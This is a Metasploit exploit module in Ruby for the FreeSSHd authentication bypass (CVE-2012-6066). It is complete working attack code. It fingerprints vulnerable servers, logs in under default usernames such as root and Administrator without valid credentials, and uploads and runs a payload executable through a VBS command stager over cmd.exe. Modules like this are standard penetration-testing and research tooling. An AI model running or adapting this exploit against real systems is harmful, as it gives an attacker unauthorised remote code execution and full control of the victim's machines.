Freesshd Authentication Bypass



require 'msf/core'

require 'tempfile'
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::EXE

    def initialize(info={})
        super(update_info(info,
            'Name'           => "Freesshd Authentication Bypass",
            'Description'    => %q{
                    This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
                authentication. You just need the username (which defaults to root). The exploit
                has been tested with both password and public key authentication.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Aris', # Vulnerability discovery and Exploit
                    'kcope', # 2012 Exploit
                    'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module
                ],
            'References'     =>
                [
                    [ 'CVE', '2012-6066' ],
                    [ 'OSVDB', '88006' ],
                    [ 'BID', '56785' ],
                    [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ],
                    [ 'URL', 'http://seclists.org/fulldisclosure/2010/Aug/132' ]
                ],
            'Platform'       => 'win',
            'Privileged'     => true,
            'DisclosureDate' => "Aug 11 2010",
            'Targets' =>
                [
                    [ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ]
                ],
            'DefaultTarget' => 0
        ))

        register_options(
            [
                OptInt.new('RPORT', [false, 'The target port', 22]),
                OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator'])
            ], self.class)
    end

    def load_netssh
        begin
            require 'net/ssh'
            return true
        rescue LoadError
            return false
        end
    end

    def check
        connect
        banner = sock.recv(30)
        disconnect
        if banner =~ /SSH-2.0-WeOnlyDo/
            version=banner.split(" ")[1]
            return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/
            return Exploit::CheckCode::Appears
        end
        return Exploit::CheckCode::Safe
    end


    def upload_payload(connection)
        exe = generate_payload_exe
        filename = rand_text_alpha(8) + ".exe"
        cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
        opts = {
            :linemax => 1700,
            :decoder => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"),
        }

        cmds = cmdstager.generate(opts)

        if (cmds.nil? or cmds.length < 1)
            print_error("The command stager could not be generated")
            raise ArgumentError
        end
        cmds.each { |cmd|
            ret = connection.exec!("cmd.exe /c "+cmd)
        }

    end

    def setup_ssh_options
        pass=rand_text_alpha(8)
        options={
            :password => pass,
            :port     => datastore['RPORT'],
            :timeout  => 1,
            :proxies  => datastore['Proxies'],
            :key_data => OpenSSL::PKey::RSA.new(2048).to_pem
        }
        return options
    end

    def do_login(username,options)
        print_status("Trying username "+username)
        options[:username]=username

        transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
        auth = Net::SSH::Authentication::Session.new(transport, options)
        auth.authenticate("ssh-connection", username, options[:password])
        connection = Net::SSH::Connection::Session.new(transport, options)
        begin
            Timeout.timeout(10) do
                connection.exec!('cmd.exe /c echo')
            end
        rescue  RuntimeError
            return nil
        rescue    Timeout::Error
            print_status("Timeout")
            return nil
        end
        return connection
    end

    def exploit
        #
        # Load net/ssh so we can talk the SSH protocol
        #
        has_netssh = load_netssh
        if not has_netssh
            print_error("You don't have net/ssh installed.  Please run gem install net-ssh")
            return
        end

        options=setup_ssh_options

        connection = nil

        usernames=datastore['USERNAMES'].split(' ')
        usernames.each { |username|
            connection=do_login(username,options)
            break if connection
        }

        if connection
            print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)")
            upload_payload(connection)
            handler
        end
    end
end